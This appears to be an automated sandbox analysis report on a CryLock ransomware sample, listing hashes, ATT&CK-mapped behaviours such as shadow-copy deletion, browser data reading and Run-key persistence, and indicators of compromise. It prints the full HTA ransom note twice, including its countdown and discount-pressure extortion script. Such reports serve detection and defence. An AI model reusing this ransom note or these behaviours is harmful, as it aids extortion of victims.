crylock | 4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba

General

Target

2f2d4eb24662c916f822f9c3fd55c9b2.exe
Size

206KB
MD5

2f2d4eb24662c916f822f9c3fd55c9b2
SHA1

9d5bda347f70b8f928803a28782a1018d9f2d0e0
SHA256

4a47769cf06cd353a24bf01392a154fb5c9c97547e63382d1859f6b90448b2ba
SHA512

1cc68736ac883a60f1113f183fa68b344b86dffc6b3853dbabbc626eb02fd69b9eb3801891c07193ab3684419e7346d4a1d0c37a5de6523df0dabae1b0051bb5
SSDEEP

3072:0bOTRwYckApvw14pcODvX/kyeAYcWNzs2C3Zm4YSYoj1ZYJJCpdXfabI8AKgcJuU:wOsZiKRJWWY1dJJQdHrYuFC

Score

10^/10

crylock discovery persistence ransomware spyware stealer

Malware Config

Extracted

Family

crylock

Attributes

emails
[email protected]

[email protected]
ransomnote
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var max_discount = 50; var start_date = new Date('<%START_DATETIME%>'); var discount_date = new Date('<%DOUBLE_DATETIME%>'); var end_date = new Date('<%UNDECRYPT_DATETIME%>'); var main_contact = '<%MAIN_CONTACT%>'; var hid = '[<%HID%>]'; var second_contact = '<%RESERVE_CONTACT%>'; var sd = end_date; var dn = new Date(); var zoc, ddGlobal; function document.onblur() { alert('Attention! This important information for you!'); } function setContacts() { document.getElementById('main_contact').innerHTML = main_contact; document.getElementById('second_contact').innerHTML = second_contact; document.getElementById('hid').innerHTML = hid; } function countDiscount() { var term_current = new Date().getTime() - start_date.getTime(); var term_full = discount_date.getTime() - start_date.getTime(); var delta = discount_date.getTime() - new Date().getTime(); delta = new Date(delta); var dt = document.getElementById('pwr'); var timer_discount = document.getElementById('timer_discount'); var discount = document.getElementById('discount'); var hours_to_end = Math.floor(term_full / 1000 / 3600); var hours_current = Math.floor(term_current / 1000 / 3600); if (discount_date.getTime() > dn.getTime()) { var disc_per_hour = parseFloat(max_discount / hours_to_end).toFixed(2); var cur_discount = Math.floor(max_discount - (disc_per_hour * hours_current)); if (discount) { discount.innerHTML = cur_discount + '% discount'; } } if (cur_discount <= 25) { dt.style.cssText = 'border: 1px solid #FFC000;'; if (timer_discount) { timer_discount.style.background = '#FFC000'; } } if (sd.getTime() < dn.getTime() || cur_discount < 5) { dt.style.cssText = 'border: 1px solid #F53636; background-color: #F53636; padding: 16px 20px;'; dt.innerHTML = '<div style="font-size: 16px; color: #ffffff; text-align: center; display: block; font-weight: bold;">Decryption key can be bought at standard cost.</div><div style="font-size: 13px; color: #fff; text-align: center; margin-top: 10px">You need to hurry up to decrypt your data because all your files will be destroyed soon.</div>'; } var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } if (timer_discount) { timer_discount.innerHTML = dd + ' ' + hh+':'+mm+':'+ss; } } function ChangeTime() { var sd = end_date; var dn = new Date(); if (sd.getTime() < dn.getTime()) { var dt = document.getElementById('lctw'); dt.innerHTML = '<b>Soon, you won\'t be able to decrypt your files. Contact us immediately!</b>'; dt.style.cssText = 'background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px; text-align: center; font-size: 20px;'; zoc = 2; } else { var delta = sd.getTime() - dn.getTime(); delta = new Date(delta); var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); ddGlobal = parseInt(dd); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt = document.getElementById('file_lost'); if (dt) { dt.innerHTML= dd+'     '+hh+':'+mm+':'+ss; } } } var count = 100, interval = 10, intervalID; function blink() { if (ddGlobal == 0 && zoc != 2) { var dt = document.getElementById('file_lost'); var dt2 = document.getElementById('text_file_lost'); var test = document.getElementById('test'); if (count == 100) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count - 2; if (count == 20) clearInterval(intervalId); }, interval); } if (count == 20) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count + 2; if (count == 100) clearInterval(intervalId); }, interval); } } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { var dt=document.getElementById('rc'); var xx=''; var i=0; while (i < 40) { xx=xx+getRandomArbitrary(0,2); i=i+1; } rc.innerHTML= xx; } function Start() { window.resizeTo(850,720); setContacts(); ChangeTime(); setInterval(ChangeTime, 1000); countDiscount(); setInterval(countDiscount, 1000); setInterval(blink, 100); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background: #000; font: 12px 'Arial', sans-serif; padding: 0; margin: 0;" onload="Start();"> <div style="height: 100%; position: absolute; top: 0; left: 0; background-color: #ffffff; box-sizing: border-box; padding: 20px; overflow-x: hidden;overflow-y: hidden;"> <div style="background-color: #000000; width: 100%; height: 55px;" id="header"> <div style="color: #F53636; font-weight: bold; font-size: 40px; text-transform: uppercase; line-height: 54px; padding-left: 8px; float: left;">ENCRYPTED</div> <div style="font-size: 18px; color: #7E7E7E; float: right; line-height: 55px; padding-right: 17px;" id="rc">11100001111011111111100001111011111100</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> <div> <div style="float: left; width: 144px; height: 110px; background-color: #000000; color: #ffffff; text-align: center; line-height: 1;"> <b style="display: block; font-size: 43px; margin-top: 24px;">What</b> <b style="display: block; font-size: 20px;">happened?</b> </div> <div style="float: right; width: 630px;"> <b style="font-size: 13px; color: #F53636;">All your documents, databases, backups, and other critical files were encrypted.</b> <div>Our software used the AES cryptographic algorithm (you can find related information in Wikipedia).</div> <br> <div>It happened because of security problems on your server, and you cannot use any of these files anymore. The only way to recover your data is to buy a decryption key from us. </div> <br> <div>To do this, please send your unique ID to the contacts below.</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> </div> <div> <div style="float: left; width: 540px;"> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(main_contact)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">E-mail:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="main_contact"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(hid)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">Unique ID:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="hid"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="margin-top: 17px; line-height: 18px;">Right after payment, we will send you a specific decoding software that will decrypt all of your files. If you have not received the response within 24 hours, please contact us by e-mail <span style="text-decoration: underline;" OnClick="copytext(second_contact)" id="second_contact"></span>.</div> </div> <div style="float: right; width: 230px;"> <div style="border: 1px solid #2FAB61;" id="pwr"> <div style="padding: 13px 14px 3px 14px; text-align: center; font-size: 14px;">During a short period, you can buy a decryption key with a </div> <div style="font-size: 25px; text-align: center; display: block; font-weight: bold;" id="discount">50% discount</div> <div id="timer_discount" style="margin-top: 10px; background-color: #219653; padding: 5px 0; text-align: center; font-size: 25px; font-weight: bold; color: #ffffff;">--:--:-- left</div> </div> <div style="margin-top: 17px; line-height: 18px;">The price depends on how soon you will contact us.</div> </div> <div style="clear: both; float: none;"></div> </div> <div style="background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px" id="lctw"> <div style="float: left; font-size: 20px; padding-top: 3px;" id="text_file_lost">All your files will be deleted permanently in:</div> <div style="float: right; font-size: 25px;" id="file_lost"></div> <div style="clear: both; float: none;"></div> </div> <div> <div style="float: left; width: 540px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">Attention! <div id="test"></div></b> <ul style="list-style: none; padding: 0; margin: 0;"> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not try to recover files yourself.</span> this process can damage your data and recovery will become impossible.</li> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not waste time trying to find the solution on the Internet.</span> The longer you wait, the higher will become the decryption key price.</li> <li style="position: relative; padding-left: 20px; font-size: 12px margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not contact any intermediaries.</span> They will buy the key from us and sell it to you at a higher price.</li> </ul> </div> <div style="float: right; width: 230px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">What guarantees do you have?</b> <div>Before payment, we can decrypt three files for free. The total file size should be less than 5MB (before archiving), and the files should not contain any important information (databases, backups, large tables, etc.)</div> </div> <div style="clear: both; float: none;"></div> </div> </div> </body> </html>

rsa_pubkey.plain

Extracted

Path

C:\$Recycle.Bin\S-1-5-21-768304381-2824894965-3840216961-1000\how_to_decrypt.hta

Ransom Note

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <title>CryLock</title> <hta:application showInTaskBar="no" APPLICATION="yes" ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no" applicationname="CryLock" border="thick" contexmenu="no" scroll="no" selection="yes" singleinstance="yes" windowstate="normal" MAXIMIZEBUTTON="NO" BORDER="DIALOG" width="100" height="100" MINIMIZEBUTTON="NO"></hta:application> <script language="JavaScript"> var max_discount = 50; var start_date = new Date('January 3 2024 21:53:35'); var discount_date = new Date('January 5 2024 21:53:35'); var end_date = new Date('January 6 2024 21:53:35'); var main_contact = '[email protected]'; var hid = '[7A47E0D5-4C965BDC]'; var second_contact = '[email protected]'; var sd = end_date; var dn = new Date(); var zoc, ddGlobal; function document.onblur() { alert('Attention! This important information for you!'); } function setContacts() { document.getElementById('main_contact').innerHTML = main_contact; document.getElementById('second_contact').innerHTML = second_contact; document.getElementById('hid').innerHTML = hid; } function countDiscount() { var term_current = new Date().getTime() - start_date.getTime(); var term_full = discount_date.getTime() - start_date.getTime(); var delta = discount_date.getTime() - new Date().getTime(); delta = new Date(delta); var dt = document.getElementById('pwr'); var timer_discount = document.getElementById('timer_discount'); var discount = document.getElementById('discount'); var hours_to_end = Math.floor(term_full / 1000 / 3600); var hours_current = Math.floor(term_current / 1000 / 3600); if (discount_date.getTime() > dn.getTime()) { var disc_per_hour = parseFloat(max_discount / hours_to_end).toFixed(2); var cur_discount = Math.floor(max_discount - (disc_per_hour * hours_current)); if (discount) { discount.innerHTML = cur_discount + '% discount'; } } if (cur_discount <= 25) { dt.style.cssText = 'border: 1px solid #FFC000;'; if (timer_discount) { timer_discount.style.background = '#FFC000'; } } if (sd.getTime() < dn.getTime() || cur_discount < 5) { dt.style.cssText = 'border: 1px solid #F53636; background-color: #F53636; padding: 16px 20px;'; dt.innerHTML = '<div style="font-size: 16px; color: #ffffff; text-align: center; display: block; font-weight: bold;">Decryption key can be bought at standard cost.</div><div style="font-size: 13px; color: #fff; text-align: center; margin-top: 10px">You need to hurry up to decrypt your data because all your files will be destroyed soon.</div>'; } var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } if (timer_discount) { timer_discount.innerHTML = dd + ' ' + hh+':'+mm+':'+ss; } } function ChangeTime() { var sd = end_date; var dn = new Date(); if (sd.getTime() < dn.getTime()) { var dt = document.getElementById('lctw'); dt.innerHTML = '<b>Soon, you won\'t be able to decrypt your files. Contact us immediately!</b>'; dt.style.cssText = 'background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px; text-align: center; font-size: 20px;'; zoc = 2; } else { var delta = sd.getTime() - dn.getTime(); delta = new Date(delta); var dd = (delta.getUTCDate()-1) + ((delta.getUTCMonth()) * 31); ddGlobal = parseInt(dd); var hh = delta.getUTCHours(); var mm = delta.getUTCMinutes(); var ss = delta.getUTCSeconds(); if (dd!=1) { dd=dd+' days'; } else { dd=dd+' day'; } if (hh<10) { hh='0'+hh; } if (mm<10) { mm='0'+mm; } if (ss<10) { ss='0'+ss; } var dt = document.getElementById('file_lost'); if (dt) { dt.innerHTML= dd+'     '+hh+':'+mm+':'+ss; } } } var count = 100, interval = 10, intervalID; function blink() { if (ddGlobal == 0 && zoc != 2) { var dt = document.getElementById('file_lost'); var dt2 = document.getElementById('text_file_lost'); var test = document.getElementById('test'); if (count == 100) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count - 2; if (count == 20) clearInterval(intervalId); }, interval); } if (count == 20) { intervalId = setInterval(function () { dt.style.filter = 'alpha(opacity='+count+')'; dt2.style.filter = 'alpha(opacity='+count+')'; count = count + 2; if (count == 100) clearInterval(intervalId); }, interval); } } } function getRandomArbitrary(min, max) { min = Math.ceil(min); max = Math.floor(max); return Math.floor(Math.random() * (max - min)) + min; } function Rndom() { var dt=document.getElementById('rc'); var xx=''; var i=0; while (i < 40) { xx=xx+getRandomArbitrary(0,2); i=i+1; } rc.innerHTML= xx; } function Start() { window.resizeTo(850,720); setContacts(); ChangeTime(); setInterval(ChangeTime, 1000); countDiscount(); setInterval(countDiscount, 1000); setInterval(blink, 100); setInterval(Rndom,100); } function copytext(s) { window.clipboardData.setData("Text",s); alert(s+' copied to clipboard'); } function Restart() { alert('Attention! This important information for you!'); } </script> <body style="background: #000; font: 12px 'Arial', sans-serif; padding: 0; margin: 0;" onload="Start();"> <div style="height: 100%; position: absolute; top: 0; left: 0; background-color: #ffffff; box-sizing: border-box; padding: 20px; overflow-x: hidden;overflow-y: hidden;"> <div style="background-color: #000000; width: 100%; height: 55px;" id="header"> <div style="color: #F53636; font-weight: bold; font-size: 40px; text-transform: uppercase; line-height: 54px; padding-left: 8px; float: left;">ENCRYPTED</div> <div style="font-size: 18px; color: #7E7E7E; float: right; line-height: 55px; padding-right: 17px;" id="rc">11100001111011111111100001111011111100</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> <div> <div style="float: left; width: 144px; height: 110px; background-color: #000000; color: #ffffff; text-align: center; line-height: 1;"> <b style="display: block; font-size: 43px; margin-top: 24px;">What</b> <b style="display: block; font-size: 20px;">happened?</b> </div> <div style="float: right; width: 630px;"> <b style="font-size: 13px; color: #F53636;">All your documents, databases, backups, and other critical files were encrypted.</b> <div>Our software used the AES cryptographic algorithm (you can find related information in Wikipedia).</div> <br> <div>It happened because of security problems on your server, and you cannot use any of these files anymore. The only way to recover your data is to buy a decryption key from us. </div> <br> <div>To do this, please send your unique ID to the contacts below.</div> </div> <div style="clear: both; float: none; height: 18px; width: 100%;"></div> </div> <div> <div style="float: left; width: 540px;"> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(main_contact)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">E-mail:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="main_contact"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="background: #EDEDED; height: 63px; line-height: 63px; margin-bottom: 5px; cursor: pointer;" OnClick="copytext(hid)"> <div style="width: 80px; float: left; font-size: 16px; color: #737373; padding-left: 18px;">Unique ID:</div> <b style="float: left; font-size: 14px; padding-left: 76px;" id="hid"></b> <div href="#" style="float: right; padding-right: 18px; font-size: 16px; color: #828282; font-weight: bold;" >copy</div> <div style="clear: both; float: none;"></div> </div> <div style="margin-top: 17px; line-height: 18px;">Right after payment, we will send you a specific decoding software that will decrypt all of your files. If you have not received the response within 24 hours, please contact us by e-mail <span style="text-decoration: underline;" OnClick="copytext(second_contact)" id="second_contact"></span>.</div> </div> <div style="float: right; width: 230px;"> <div style="border: 1px solid #2FAB61;" id="pwr"> <div style="padding: 13px 14px 3px 14px; text-align: center; font-size: 14px;">During a short period, you can buy a decryption key with a </div> <div style="font-size: 25px; text-align: center; display: block; font-weight: bold;" id="discount">50% discount</div> <div id="timer_discount" style="margin-top: 10px; background-color: #219653; padding: 5px 0; text-align: center; font-size: 25px; font-weight: bold; color: #ffffff;">--:--:-- left</div> </div> <div style="margin-top: 17px; line-height: 18px;">The price depends on how soon you will contact us.</div> </div> <div style="clear: both; float: none;"></div> </div> <div style="background-color: #F53636; color: #ffffff; font-weight: bold; padding: 19px 24px; margin: 17px 0 24px" id="lctw"> <div style="float: left; font-size: 20px; padding-top: 3px;" id="text_file_lost">All your files will be deleted permanently in:</div> <div style="float: right; font-size: 25px;" id="file_lost"></div> <div style="clear: both; float: none;"></div> </div> <div> <div style="float: left; width: 540px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">Attention! <div id="test"></div></b> <ul style="list-style: none; padding: 0; margin: 0;"> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not try to recover files yourself.</span> this process can damage your data and recovery will become impossible.</li> <li style="position: relative; padding-left: 20px; font-size: 12px; margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not waste time trying to find the solution on the Internet.</span> The longer you wait, the higher will become the decryption key price.</li> <li style="position: relative; padding-left: 20px; font-size: 12px margin-bottom: 14px;"> <span style="position: absolute; font-size: 27px; left: 0; color: #F53636; top: -1px;">!</span> <span style="color: #F53636;">Do not contact any intermediaries.</span> They will buy the key from us and sell it to you at a higher price.</li> </ul> </div> <div style="float: right; width: 230px;"> <b style="margin-bottom: 11px; font-size: 14px; display: block;">What guarantees do you have?</b> <div>Before payment, we can decrypt three files for free. The total file size should be less than 5MB (before archiving), and the files should not contain any important information (databases, backups, large tables, etc.)</div> </div> <div style="clear: both; float: none;"></div> </div> </div> </body> </html>

Emails

[email protected]

Signatures

Crylock
Ransomware family, which is a new variant of Cryakl ransomware.
ransomware crylock
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2f2d4eb24662c916f822f9c3fd55c9b2.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	2f2d4eb24662c916f822f9c3fd55c9b2.exe

Drops startup file 1 IoCs

Processes:

2f2d4eb24662c916f822f9c3fd55c9b2.exe

description ioc process

File created \??\c:\users\admin\appdata\roaming\microsoft\word\startup\how_to_decrypt.hta 2f2d4eb24662c916f822f9c3fd55c9b2.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
File created	\??\c:\users\admin\appdata\roaming\microsoft\word\startup\how_to_decrypt.hta	2f2d4eb24662c916f822f9c3fd55c9b2.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

2f2d4eb24662c916f822f9c3fd55c9b2.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7A47E0D5-4C965BDC = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2f2d4eb24662c916f822f9c3fd55c9b2.exe\" -id \"7A47E0D5-4C965BDC\" -wid \"vis\""	2f2d4eb24662c916f822f9c3fd55c9b2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\1287499 = "1287499"	2f2d4eb24662c916f822f9c3fd55c9b2.exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Drops desktop.ini file(s) 30 IoCs

Processes:

2f2d4eb24662c916f822f9c3fd55c9b2.exe

description	ioc	process
File opened for modification	\??\c:\users\admin\3d objects\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\documents\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\downloads\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\favorites\links\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\saved games\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\desktop\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\searches\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\default\appdata\roaming\microsoft\internet explorer\quick launch\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\libraries\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\f:\$recycle.bin\s-1-5-21-768304381-2824894965-3840216961-1000\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\downloads\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\favorites\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\onedrive\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\documents\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\videos\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\desktop\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\music\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\pictures\camera roll\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\pictures\saved pictures\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\links\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\music\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\videos\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\accountpictures\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\$recycle.bin\s-1-5-21-768304381-2824894965-3840216961-1000\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\contacts\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\admin\pictures\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe
File opened for modification	\??\c:\users\public\pictures\desktop.ini	2f2d4eb24662c916f822f9c3fd55c9b2.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

2f2d4eb24662c916f822f9c3fd55c9b2.exe

description ioc process

File opened (read-only) \??\F: 2f2d4eb24662c916f822f9c3fd55c9b2.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened (read-only)	\??\F:	2f2d4eb24662c916f822f9c3fd55c9b2.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

2f2d4eb24662c916f822f9c3fd55c9b2.exe

pid	process
616	2f2d4eb24662c916f822f9c3fd55c9b2.exe
616	2f2d4eb24662c916f822f9c3fd55c9b2.exe
616	2f2d4eb24662c916f822f9c3fd55c9b2.exe
616	2f2d4eb24662c916f822f9c3fd55c9b2.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

Processes:

WMIC.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	4748	WMIC.exe
Token: SeSecurityPrivilege	4748	WMIC.exe
Token: SeTakeOwnershipPrivilege	4748	WMIC.exe
Token: SeLoadDriverPrivilege	4748	WMIC.exe
Token: SeSystemProfilePrivilege	4748	WMIC.exe
Token: SeSystemtimePrivilege	4748	WMIC.exe
Token: SeProfSingleProcessPrivilege	4748	WMIC.exe
Token: SeIncBasePriorityPrivilege	4748	WMIC.exe
Token: SeCreatePagefilePrivilege	4748	WMIC.exe
Token: SeBackupPrivilege	4748	WMIC.exe
Token: SeRestorePrivilege	4748	WMIC.exe
Token: SeShutdownPrivilege	4748	WMIC.exe
Token: SeDebugPrivilege	4748	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4748	WMIC.exe
Token: SeRemoteShutdownPrivilege	4748	WMIC.exe
Token: SeUndockPrivilege	4748	WMIC.exe
Token: SeManageVolumePrivilege	4748	WMIC.exe
Token: 33	4748	WMIC.exe
Token: 34	4748	WMIC.exe
Token: 35	4748	WMIC.exe
Token: 36	4748	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4748	WMIC.exe
Token: SeSecurityPrivilege	4748	WMIC.exe
Token: SeTakeOwnershipPrivilege	4748	WMIC.exe
Token: SeLoadDriverPrivilege	4748	WMIC.exe
Token: SeSystemProfilePrivilege	4748	WMIC.exe
Token: SeSystemtimePrivilege	4748	WMIC.exe
Token: SeProfSingleProcessPrivilege	4748	WMIC.exe
Token: SeIncBasePriorityPrivilege	4748	WMIC.exe
Token: SeCreatePagefilePrivilege	4748	WMIC.exe
Token: SeBackupPrivilege	4748	WMIC.exe
Token: SeRestorePrivilege	4748	WMIC.exe
Token: SeShutdownPrivilege	4748	WMIC.exe
Token: SeDebugPrivilege	4748	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4748	WMIC.exe
Token: SeRemoteShutdownPrivilege	4748	WMIC.exe
Token: SeUndockPrivilege	4748	WMIC.exe
Token: SeManageVolumePrivilege	4748	WMIC.exe
Token: 33	4748	WMIC.exe
Token: 34	4748	WMIC.exe
Token: 35	4748	WMIC.exe
Token: 36	4748	WMIC.exe
Token: SeBackupPrivilege	4584	vssvc.exe
Token: SeRestorePrivilege	4584	vssvc.exe
Token: SeAuditPrivilege	4584	vssvc.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

2f2d4eb24662c916f822f9c3fd55c9b2.execmd.exe

description	pid	process	target process
PID 616 wrote to memory of 1484	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 1484	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 1484	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 4708	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 4708	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 4708	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 1744	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 616 wrote to memory of 1744	616	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
